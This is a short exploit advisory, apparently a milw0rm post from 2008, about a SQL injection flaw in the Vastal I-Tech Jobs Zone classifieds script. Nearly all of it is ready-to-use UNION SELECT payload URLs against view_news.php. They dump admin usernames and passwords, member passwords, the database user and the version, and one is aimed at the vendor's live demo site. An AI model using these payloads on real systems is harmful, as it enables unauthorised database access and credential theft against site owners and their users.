####################################################### # Vastal I-Tech Jobs Zone SQL Injection Vulnerability # # Author : Stack # # # Script Home Page : http://www.vastal.com/jobs-zone-classifieds-script.html # # Demo : http://www.vastal.com/jobs/ ####################################################### Exploit: http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/* http://site.il/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),version(),4,5,6,7/**/from/**/members/* Live Demo http://www.vastal.com/jobs/view_news.php?news_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/* ############################################################################################################## # milw0rm.com [2008-09-05]